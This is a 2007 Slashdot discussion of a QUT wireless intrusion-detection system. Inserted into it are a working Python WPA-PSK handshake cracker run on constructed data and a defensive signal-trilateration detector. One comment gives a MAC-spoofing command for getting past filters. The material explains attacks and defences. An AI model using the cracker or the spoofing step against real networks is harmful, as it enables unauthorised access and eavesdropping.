New Way to ID Invisible Intruders on Wireless LANs

Posted by Zonk on Fri Nov 30, 2007 08:45 AM
from the you-have-laboured-to-produce-a-biologic dept.
Bergkamp10 writes "Australia's University of Technology in Queensland has created a groundbreaking new system that can detect invisible intruders on wireless LANs. Wireless networks have been almost impossible to thoroughly secure as they possess no clearly defined boundaries; instead they are defined by the quality and strength of the receiving antenna. QUT Information Security Institute researcher Dr Jason Smith has invented a new system to detect eavesdropping on unencrypted networks or active hijackings of computer sessions when a legitimate user who is logged onto the network leaves the connection. Smith has created a series of monitoring techniques that, when used together, can detect both attackers and configuration mistakes in network devices."
  • I don't know about that. I use WPA-PSK security on my WLAN, and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?
    • by cbiltcliffe (186293) on Friday November 30 2007, @10:03AM (#21532515) Homepage Journal

      and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?
      If the intruders were invisible, how would you see them in logs and IDS? They're invisible. Passive monitoring won't show up in any logs. I know, because I do it sometimes as part of my security service to my customers. You can break into a WEP-encrypted moderate-traffic wireless network without sending a single packet. Once you're in, you can capture all traffic on that network and save it, again, without sending a single packet.
      WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own.

      Using the Storm botnet as an example:

      There were estimates that put the botnet as large as 50,000,000 computers. Having done WPA-PSK key cracking on a P4 1.6 laptop, it can run around 30 passphrases/second. My desktop is significantly faster, although I haven't actually tried PSK cracking on it. I'd assume probably 45 / second or more. It's not a state of the art machine, by any means. Probably about average.

      So if we assume an 8 character random passphrase, (which is all a lot of people will use, so it's easier to remember) that you can type on your keyboard, (again, who's going to use Alt-Numpad combinations?) there are 96 possible keystroke characters that can make up each byte. 96^8 = 7213895789838336 possible password combinations.
      Assuming 45 passphrases / second for each machine, it will take, using this botnet, just over 37 days to break that password. That's assuming the most complex password possible for 8 characters. Realistically, you can take out any special character that's not in 13375p3@k, and for most, all you'd need is numbers and letters. That'll cut your time significantly.
      Yes, that's only an 8 character password, which will take 96 times as long to break with only 1 extra character, but how many people, who don't use their full allotment of 63-characters of randomness, are going to use something like "password", "dave sucks", "fleabert" (name of their cat), or even "fleabert scratches too much" as their passphrase?
      Now you've got standard words, which can easily be pulled from a dictionary and put together in different combinations until the passphrase is cracked. Trivial, with enough computing power. And unfortunately, the only people who have access to that kind of computing power, are (I shudder to use the word) cybercriminals.
      • Of course, any security can be cracked... I personally use a shared key that is significantly longer than that. Adding 1 extra character over 8 makes it 96^9, but adding, say, 3 extra characters makes it 6382393305518410039296 possible password combinations, which would take that same botnet like 90,000 years to crack.

        Oh, yeah, and bear in mind: those 50,000,000 would all have to be in range of the access point and would have to not overwhelm the access point. Even the best Cisco Aironet equipment isn't g
        • You only need one computer in range of the WAP to capture the encrypted traffic. Then a bot net could be used to attempt to decrypt the traffic. While doing this is significantly harder than trying to associate directly, it is also totally passive, and can be run in parallel.
            • Re: (Score:3, Informative)

              You need to look into cracking WPA-PSK. You don't need to know anything about the traffic. All you need are 4 packets, one of which is a hash of the passphrase. You hash your passphrase list until you find one that matches the hash captured from the AP, and then you've got your passphrase. No extra traffic necessary.
      • Re: (Score:2, Informative)

        by Anonymous Coward
        Yeah, but if you set up your wireless network with a specific set of MACs and only allow those MACs to log in, keep all of your machines on so someone can't hijack the MAC, and disable logins to your router from anything but one of those MACs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

        If you augment this with weekly password changes and the strongest possible password, they aren't getting in unle
        • >>Yeah, but if you set up your wireless network with a specific set of MACs and only allow those MACs to log in, keep all of your machines on so someone can't hijack the MAC, and disable logins to your router from anything but one of those MACs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

          Or you could just change your MAC. This is very easy.
          ifconfig eth1 hw ether newmacaddress

          this also isn't
      • Re: (Score:3, Interesting)

        Thanks for laying that out. I don't know what makes this so hard for people to get/do. Come up with 3 to 5 words of something that means something to you, separate with some punctuation, and make sure it's around even only 20 characters, and it should take a million machine botnet something like 10^21 years to crack, assuming the 45 tries a second metric. e.g., "IHave7FavoriteFl()wer&" should be good for something like the remaining life of the universe. (3.6*10^27 years, by my calculations)

        Even so
      • Re: (Score:2, Informative)

        "WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own."

        You are assuming that WPA needs a human-configured passphrase here. Your calculations are all nice, but they refer to WPA-PSK (pre-shared key). If you use WPA with IEEE 802.1x (sometimes called WPA-"Enterprise"), a PMK (Pairwise Master Key) is generated by an AAA server *anew for every session*. I.e. as soon as someone logs
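The key-cracking arithmetic in this thread and the "four packets, one of which is a hash of the passphrase" description boil down to the following. This is an added example written for this page, not code from anyone in the thread, from QUT or from any product mentioned: it derives the PMK with PBKDF2 the way WPA-PSK does, expands it to the PTK using the nonces and MAC addresses a 4-way handshake exposes, checks the EAPOL MIC for each candidate passphrase, and computes the same exhaustive-search estimates used above. The SSID, MAC addresses, nonces, the EAPOL frame and the candidate list are all constructed for the example; in practice they come from a sniffed handshake.

```python
"""Offline WPA-PSK recovery from a captured 4-way handshake (added example).
The SSID, MACs, nonces, EAPOL frame and candidate list are all constructed;
a real attack takes them from a sniffed handshake and never needs data traffic."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are why a guess costs milliseconds rather than microseconds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64 bytes we keep
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """Key descriptor version 2 (CCMP): MIC = first 16 bytes of HMAC-SHA1 over the frame."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, captured_mic, candidates):
    """Return the candidate whose derived KCK reproduces the captured MIC, else None."""
    for guess in candidates:
        pmk = pmk_from_passphrase(guess, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return guess
    return None


def crack_time_days(keyspace, hosts, guesses_per_second_per_host):
    """Worst-case exhaustive-search time, the arithmetic used in the thread."""
    return keyspace / (hosts * guesses_per_second_per_host) / 86400


def build_eapol_msg2(snonce):
    """Constructed EAPOL-Key message 2 (station -> AP) with the 16-byte MIC field
    zeroed, which is the form the MIC is computed over. No key data appended."""
    key_info = (0x010A).to_bytes(2, "big")      # descriptor v2, pairwise, MIC bit set
    body = (b"\x02" + key_info + b"\x00\x00"    # RSN descriptor, key info, key length
            + (1).to_bytes(8, "big") + snonce   # replay counter, SNonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
            + bytes(16) + b"\x00\x00")          # zeroed MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type Key


# Constructed "capture" parameters (not from any real network).
SSID = "fleabert-net"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = build_eapol_msg2(SNONCE)
CANDIDATES = ["password", "dave sucks", "fleabert", "fleabert scratches too much", "correcthorse"]


def simulate_capture(true_passphrase):
    """Stand-in for sniffing: the MIC a station with this passphrase would send."""
    pmk = pmk_from_passphrase(true_passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_MSG2)


if __name__ == "__main__":
    mic = simulate_capture("fleabert scratches too much")
    print("recovered:", crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE,
                                        EAPOL_MSG2, mic, CANDIDATES))
    print("96^8 keyspace, 50M hosts at 45/s: %.1f days" % crack_time_days(96 ** 8, 50_000_000, 45))
    print("96^11 keyspace: %.0f years" % (crack_time_days(96 ** 11, 50_000_000, 45) / 365))
```

What the handshake exposes is a MIC keyed (via PBKDF2 and the two nonces) from the passphrase, not a bare hash of it, so every guess costs 4096 HMAC-SHA1 rounds plus the PTK expansion; that per-guess cost is what the tens-of-guesses-per-second figures above reflect. The candidate list is the point made about cat names and phrases: a wordlist beats exhaustive search whenever the passphrase is built from words, while the 96^11 figure shows why a genuinely random key of modest length is out of reach even for the botnet in the estimate. With 802.1X/EAP the PMK is produced by the per-session EAP exchange rather than derived from a passphrase, so there is nothing for this kind of offline guessing to target.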
  • by faloi (738831) on Friday November 30 2007, @09:00AM (#21531729)
    The description is, basically, they use the signal strength and round trip times of the signals to figure out if someone unauthorized is on your network. The downside is that, in large corporate wireless networks, I would think people tend to be pretty mobile and there won't be a reliable indicator that the odd signal from slightly too far away isn't just somebody who remembered one last thing on the way to their car. Smaller wireless networks aren't likely to care enough to spend the time it takes to tell.

    It's an interesting idea, but I have a hard time seeing it become widespread.
    • Re: (Score:2, Insightful)

      Whilst you have somewhat of a point, the odd occasion where one may forget something and try to access the LAN at his car is an outlier to the data set. If the system notices someone from that location connecting to the network, it can either force a new authentication event requiring a local cert, or simply shut down the AP the external person is connecting to. (Preferably shutting it down.)

      As an aside, the company can also have a policy explicitly forbidding access from the parking lot. If what they
      • That's actually a good point. I come at it from the point of view of the large companies I've worked for. To get on the corporate network via a wireless connection, you still have to authenticate to a VPN server. We have a separate wireless network that visitors from other companies can use, but it's got no connection to the corporate network. I'm sure it's not that way for every large company.
  • Damn (Score:5, Funny)

    by FredDC (1048502) on Friday November 30 2007, @09:02AM (#21531755)
    What? No, but this means that I[NO CARRIER]
  • by Anonymous Coward on Friday November 30 2007, @09:06AM (#21531813)
    Yeah, right, detect eavesdropping. Any other snake oil you want to sell?
    • Yeah, right, detect eavesdropping. Any other snake oil you want to sell?

      I have a pain-relief gel which has a side-effect of super-(strength/speed/control of sea animals).

  • Triangulation (Score:5, Interesting)

    by JustKidding (591117) on Friday November 30 2007, @09:07AM (#21531821)
    So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation? Also, varying the signal strength and round trip time could throw this off, but even if the exact location of the attacker cannot be determined because of it, the alarm could still be raised.
    • So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation?

      Sounds like they're not "triangulating" - computing the DIRECTION to a station from two monitoring locations in order to identify the station's location as the third point of a triangl
  • Aussies are really into all this wireless stuff!

    I'm fairly new to all this but at a very basic level it seems to make sense.
    It's just a more complex method of looking at the flashing lights on the modem to see if it's in sync with your known wireless connections. -- Okay, a lot more complex than that.

    I wonder if this can be applied to other wireless systems, e.g., radio systems. If so, it would be very useful
  • eavesdropping (Score:5, Interesting)

    by backwardMechanic (959818) on Friday November 30 2007, @09:13AM (#21531903) Homepage
    You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that? Warping of the ether?
    • Re: (Score:2, Interesting)

      Quantum Entanglement! We've got on-board chips for that ... right?
    • TFA doesn't claim a method for detecting eavesdropping. Bad summary.
    • Re:eavesdropping (Score:5, Insightful)

      by Ungrounded Lightning (62228) on Friday November 30 2007, @09:42PM (#21540797) Journal
      You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that?

      Your firmware might react to being associated with a network enough to eavesdrop it by also responding to low-level configuration traffic. If that happens, even if you don't send any data the firmware may respond to probes, letting the network know you're listening.

      If you're truly eavesdropping you're undetectable. But do you know what the vendor put in the binary blob?
  • by Anonymous Coward
    "Depending on how sensitive the network is, armed security guards could be deployed [...]"

    And they would shoot the guy with the laptop in the lobby? Whoops, wrong guy. It was the other guy in the lobby. Nope, it was the woman in the parking lot. Wait, no, it was an anomaly.

    Sounds more like a weak attempt at a research project.
    • I work around some areas that would have this much sensitivity; it'd be more like 'there's somebody/something over there that's not authorized', they'd go check everyone, find the device and arrest.

      Shooting would only come into effect if they resisted.

      Of course, at those security levels they don't use wireless.
    • Armed guard should first look for the guy who thinks a sensitive network can adopt wireless connections.
  • by mybecq (131456) on Friday November 30 2007, @09:27AM (#21532043) Homepage

    Australia's University of Technology in Queensland
    Otherwise known in reality as the Queensland University of Technology [qut.edu.au] in Australia.
    Zonk or Bergkamp10, please do us all a favour and don't change the name of institutions.
  • by computerchimp (994187) on Friday November 30 2007, @09:42AM (#21532241)
    1) hopping from one router to another is detected via traditional means
    2) higher than average roundtrip times are noticed via traditional means
    3) signal is triangulated via traditional means to put a location on a suspected signal.

    A new but obvious procedure that someone has decided to put to paper and product. It is a nice product to notice, but this is about as ground breaking as peanut butter and chocolate.

    CC
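The three monitoring techniques listed above (hopping between APs, round-trip times, locating a station from signal measurements) are straightforward to sketch. The following is an added example written for this page, not code from QUT, Newbury Networks or any other product named in the thread: it estimates each station's position from the RSSI seen at three fixed sensors using a log-distance path-loss model and trilateration, then flags stations outside a site boundary or whose estimated position jumps mid-session (the "legitimate user walks away, someone else continues the session" case from the summary). Sensor coordinates, model constants, thresholds, MAC addresses and RSSI readings are all constructed; round-trip time is not modelled.

```python
"""Location-based WLAN anomaly detection (added example; all data constructed).
Each station's position is estimated from the RSSI seen at three fixed sensors,
then checked against a site boundary and against its own previous position."""
import math

# Hypothetical fixed monitoring sensors, (x, y) in metres, inside the building.
SENSORS = {"s1": (0.0, 0.0), "s2": (20.0, 0.0), "s3": (0.0, 20.0)}
# Rectangle that counts as "inside": x_min, x_max, y_min, y_max (assumed).
BOUNDS = (-2.0, 22.0, -2.0, 22.0)
# Log-distance path-loss model, RSSI(d) = P0 - 10*n*log10(d); assumed calibration.
P0_DBM = -40.0       # RSSI at 1 m
PATH_LOSS_N = 3.0    # indoor path-loss exponent
# A station that "moves" this far within this many seconds is suspect (assumed).
JUMP_METRES = 15.0
JUMP_SECONDS = 5.0


def rssi_to_distance(rssi_dbm):
    """Invert the path-loss model to get an estimated range in metres."""
    return 10 ** ((P0_DBM - rssi_dbm) / (10 * PATH_LOSS_N))


def trilaterate(readings):
    """readings: {sensor_id: rssi_dbm} for all three sensors. Returns (x, y)."""
    (x1, y1), (x2, y2), (x3, y3) = (SENSORS[s] for s in ("s1", "s2", "s3"))
    d1, d2, d3 = (rssi_to_distance(readings[s]) for s in ("s1", "s2", "s3"))
    # Subtracting sensor 1's circle equation from the others gives two linear
    # equations: 2(xi-x1)x + 2(yi-y1)y = d1^2 - di^2 + xi^2 - x1^2 + yi^2 - y1^2
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = d1 ** 2 - d2 ** 2 + x2 ** 2 - x1 ** 2 + y2 ** 2 - y1 ** 2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = d1 ** 2 - d3 ** 2 + x3 ** 2 - x1 ** 2 + y3 ** 2 - y1 ** 2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-9:
        raise ValueError("sensors are collinear; position is not solvable")
    return ((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det)


def inside_bounds(pos):
    x, y = pos
    x_min, x_max, y_min, y_max = BOUNDS
    return x_min <= x <= x_max and y_min <= y <= y_max


def analyse(observations):
    """observations: list of (t_seconds, station_mac, {sensor: rssi}) in time order.
    Returns a list of (t, mac, reason, (x, y)) alerts."""
    alerts = []
    last_seen = {}  # mac -> (t, position)
    for t, mac, readings in observations:
        pos = trilaterate(readings)
        if not inside_bounds(pos):
            alerts.append((t, mac, "outside site boundary", pos))
        if mac in last_seen:
            t_prev, pos_prev = last_seen[mac]
            if t - t_prev <= JUMP_SECONDS and math.dist(pos, pos_prev) > JUMP_METRES:
                alerts.append((t, mac, "location jump (possible session hijack)", pos))
        last_seen[mac] = (t, pos)
    return alerts


# Constructed sensor log: a legitimate laptop near (10, 10), an unknown station
# out in the parking lot near (40, 10), then the laptop's MAC seen from there.
OBSERVATIONS = [
    (0.0, "00:11:22:33:44:55", {"s1": -74.52, "s2": -74.52, "s3": -74.52}),
    (2.0, "00:11:22:33:44:55", {"s1": -74.52, "s2": -74.52, "s3": -74.52}),
    (3.0, "66:77:88:99:aa:bb", {"s1": -88.46, "s2": -80.48, "s3": -88.46}),
    (5.0, "00:11:22:33:44:55", {"s1": -88.46, "s2": -80.48, "s3": -88.46}),
]

if __name__ == "__main__":
    for t, mac, reason, (x, y) in analyse(OBSERVATIONS):
        print(f"t={t:4.1f}s {mac} {reason}: est. position ({x:.1f}, {y:.1f})")
```

The two objections raised in the thread show up directly in the parameters: a mobile workforce means the jump threshold and window have to be tuned against real walking speeds or the detector drowns in false positives, and a directional high-gain antenna breaks the assumption that RSSI tracks distance, so the position estimate for such a station is simply wrong. Both are reasons to treat an alert as a trigger for re-authentication or AP shutdown rather than as proof of location, and nothing here can see a purely passive listener.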
  • Newbury Networks, among others, have used triangulation coupled with latency to 'watch' 'intruders' on networks.

    Businesses that don't put lock on their doors-- oops I mean a strong access key-- invite break-ins. It IS POSSIBLE to secure specific access points to the point where it's no longer useful to try and crack them; WPA2 with a random strong temporal, randomly-changed key (say 24hrs at most) will suffice. Instead, notebooks or stationary devices are more astute targets for the ne'er-do-wells.
  • Not to flame or troll or slashvertise, but how is this new? I was at a conference recently where the coolest security product on display was from http://www.airtightnetworks.net/ [airtightnetworks.net]: Their WIPS can be configured with an organization's known wireless clients (MAC address, make, HW and SW versions, etc.), and then detect systems that shouldn't be there.

    According to the reseller's CTO - I had the good fortune to stop by the booth before he and the COO departed and the booth was left with only salesdroids - the syst

  • He said the valuable commodity at greatest risk on local area networks was information.

    What, not like gold bullion or something?
  • Now, I may not be a physicist, but I'll play one here on Slashdot.

    I really don't see how this can detect eavesdropping. Of course, my definition of eavesdropping is that it is a passive activity, listening if you will, but not talking.

    Since this technology appears to be predicated on receiving a signal from the "eavesdropper", the real world equivalent would be the eavesdropper butting into your conversation to ask you a question or to tell you something.

    Not that it isn't interesting or cool but perhaps the cl
    • Re: (Score:3, Insightful)

      But leave the router open, wouldya?
      No, I won't.

      I don't want anyone not authorised by me on my network. I see no reason why I ought to be required to 'provide this service to all listeners'. Sorry, my network, my rules.
      • He didn't say your network. Just let people browse the big evil world wide web.
        • Why the Hell would I want random strangers to reduce my bandwidth? If they want to browse the big evil world wide web, let them pay for their own high speed connection.
        • Re: (Score:3, Insightful)

          Because if they download kiddie pr0n, it's *MY* IP address that gets logged, and my house the FBI raids looking for said kiddie pr0n.
          Not worth the risk to be a good Samaritan to the neighbors who can't afford their own internet.
      • Your network which is being beamed to my house.
        If you want it secure, stop broadcasting it. Simple. :)
    • Re: (Score:2, Insightful)

      What I love is that (the summary at least) article states you can use this to see if someone is monitoring your network.

      Excuse me? How in the hells would you tell if someone was passively reading incoming radio waves? Isn't that the point of active vs passive radar systems, for instance? You can't!
    • Sure, I'll unsecure my wireless network for you to use. As long as you leave your front door unlocked so I can come over to your house anytime I want, make a sandwich, watch some TV, play some video games, etc.
      Entertainment is what we want. If you want to do entertaining things, you ought to be required to provide this service to all.
      • Because it doesn't cost you anything extra, and if you do that, the moochers will let you browse for free when you're somewhere and need to check something.
        • Doesn't cost you anything extra except bandwidth you mean. And money if they decide to bittorrent a few songs. And jail time if they decide to visit a few child porn sites.
        • No, it isn't free. It might not cost any money directly, but I'd personally factor in the cost of the possibility of dealing with the police or FBI at some point into the cost.

          Anybody posting here should know better than to leave a WAP open, the amount of trouble that can be caused by somebody abusing the set up is more than sufficient to justify keeping a sound security policy. Even then it may get broken, but that's where plausible deniability comes into it.
          • Even then it may get broken, but that's where plausible deniability comes into it.

            You always have plausible deniability, even if you don't have an access point at all. It's completely possible and quite frequent that people's computers are 0wned by viruses and trojans, and used to route anonymous traffic, send spam, and mount scans and attacks on other machines. If securing your systems was required to give plausible deniability, millions upon millions of computer users could be subject to criminal pro
            • "You always have plausible deniability"

              Yeah, that worked splendidly in the Jammie Thomas case [wired.com].

              "Nothing can protect you from having to deal with the police or the FBI."

              Well, not completely, but I would say not allowing people to commit crimes on your network would do something to dissuade that a little bit. And this [arstechnica.com] headline couldn't more clearly refute your claim - "Child porn case shows that an open WiFi network is no defense". From TFA -
              The merits of leaving your wireless access point (WAP) ope
              • Reading TFA. (Score:3, Informative)

                Well, the first thing you need to do is actually start reading the article you're using for support. From the fine article you quoted:

                The FBI says it found CDs with child porn in Perez's room, the only one it searched.

                Up to the time you can show how a wifi connection will make a physical CD magically show up in a room, then any argument about plausible deniability based off this case is full of it. You can't claim someone else was using your wireless connection to download child porn when you have a big st

    • Right, that keeps out amateurs and lazy hackers. Somebody that really, really wants in can still find a way eventually (except for WPA2... that hasn't been cracked yet has it?)

      On mine, I've also taken the steps of disabling DHCP, and setting my network subnet mask to 248 as the last octet. This leaves only 6 IP's available, exactly the number of devices on my network. A hacker would not only have to clone a MAC address, but take one of my in-use IP addresses. Not an impossible task, but a pain in the as
    • Re: (Score:2, Informative)

      WEP is useless and can be cracked in less than 10 minutes using any laptop made in the last 10 years. Keep on using that WPA though.
      MAC filtering is useless because anyone with Kismet can see the active MAC addresses on the network.
      SSID hiding is useless because anyone with Kismet can see the active SSIDs around them.

      Someone mentioned it earlier, but have a look at this:
      http://blogs.zdnet.com/Ou/index.php?p=43 [zdnet.com]
    • 802.1X (It's a capital X) is not an authentication protocol. It's an architecture (1X) and a protocol (EAPoL) to carry a protocol (EAP) that carries authentication protocols (EAP methods).

      What you said is akin to recommending a purchaser of a computer use the box it came in.